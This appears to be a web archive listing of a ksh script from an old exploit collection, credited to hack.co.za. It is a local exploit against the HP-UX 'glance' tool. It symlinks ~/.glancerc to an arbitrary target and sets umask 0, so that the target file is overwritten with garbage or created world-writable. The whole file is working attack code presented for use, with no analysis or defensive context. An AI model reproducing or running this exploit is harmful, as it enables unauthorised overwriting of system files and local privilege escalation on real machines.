home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / hpux / local / glance2.sh < prev    next >
Linux/UNIX/POSIX Shell Script  |  2005-02-12  |  738b  |  43 lines

  1. #!/bin/ksh
  2. #
  3. # the one .traz
  4.  
  5. FILE=$1
  6. PROGGIE=`basename $0`
  7. GLANCE=/usr/perf/bin/glance
  8.  
  9. if [ -z "$1" ]
  10. then
  11.   echo "usage: $PROGGIE file_to_create_or_overwrite"
  12.   exit
  13. fi
  14.  
  15. if [ -f ~/.glancerc ]
  16. then
  17.   mv ~/.glancerc ~/.glancerc.old
  18. fi
  19.  
  20. umask 0
  21. ln -s $FILE ~/.glancerc
  22. if [ -f $FILE ]
  23. then
  24.   echo "File exists -- will be overwritten with garbage"
  25. else
  26.   echo "File doesn't exist -- will be created mode 666"
  27.   CREATE_666="yes"
  28. fi
  29. echo "Please wait about 10 seconds or so"
  30. ${GLANCE} -j 1 -iterations 1 > /dev/null 2>&1
  31. if [ -n "${CREATE_666}" ]
  32. then
  33.   >$FILE
  34. fi
  35.  
  36. rm ~/.glancerc
  37. if [ -f ~/.glancerc.old ]
  38. then
  39.   mv ~/.glancerc.old ~/.glancerc
  40. fi
  41.  
  42.  
  43. #                 www.hack.co.za           [2000]#